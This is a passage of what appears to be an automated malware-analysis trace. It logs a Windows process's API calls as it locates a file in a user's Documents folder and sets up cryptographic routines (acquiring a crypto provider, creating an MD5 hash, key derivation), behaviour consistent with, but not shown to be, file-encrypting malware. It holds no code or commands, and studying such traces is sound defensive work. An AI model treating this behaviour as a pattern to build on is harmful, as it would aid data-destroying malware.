wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.414] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x180d77d0, ftCreationTime.dwHighDateTime=0x1d5bd8a, ftLastAccessTime.dwLowDateTime=0x764685a0, ftLastAccessTime.dwHighDateTime=0x1d5b8f1, ftLastWriteTime.dwLowDateTime=0x764685a0, ftLastWriteTime.dwHighDateTime=0x1d5b8f1, nFileSizeHigh=0x0, nFileSizeLow=0x8e5a, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="cJZMs2vLnTpB5-vCp3UM.pps", cAlternateFileName="CJZMS2~1.PPS")) returned 0x7c2240 [0034.414] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0034.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0034.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0034.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0034.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.414] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.415] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0034.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0034.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0034.415] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.415] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0034.415] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0034.415] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.415] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0034.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0034.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0034.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0034.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0034.415] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0034.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0034.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0034.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0034.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0034.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0034.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0034.415] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0034.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.415] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0034.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0034.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0034.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0034.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0034.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0034.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0034.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0034.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb50 [0034.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0034.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0034.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0034.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0034.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0034.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0034.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0034.416] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0034.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0034.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0034.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0034.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0034.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0034.416] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0034.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0034.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0034.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0034.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0034.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0034.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0034.416] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0034.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0034.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0034.417] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0034.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0034.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0034.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0034.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0034.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0034.417] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.417] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0034.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0034.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.417] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0034.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0034.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0034.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0034.417] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0034.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0034.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0034.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0034.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0034.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0034.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0034.418] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0034.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0034.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0034.418] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0034.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.418] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0034.418] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0034.418] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.418] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.418] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.418] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0034.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.419] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.419] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0034.419] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.419] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0034.419] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0034.419] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0034.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.419] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0034.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0034.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.419] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0034.419] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0034.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0034.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0034.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0034.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0034.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0034.419] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0034.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0034.419] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0034.419] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0034.419] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0034.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.420] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.420] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0034.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0034.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0034.420] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.420] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0034.420] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.420] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.420] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0034.421] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.421] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0034.421] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0034.421] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0034.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0034.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0034.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0034.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0034.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.421] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.421] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0034.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0034.421] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.421] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0034.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0034.421] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0034.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0034.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0034.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0034.421] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0034.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0034.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0034.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0034.421] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0034.422] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0034.422] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.422] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0034.422] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9c8 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0034.422] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac320 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0034.422] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0034.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0034.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 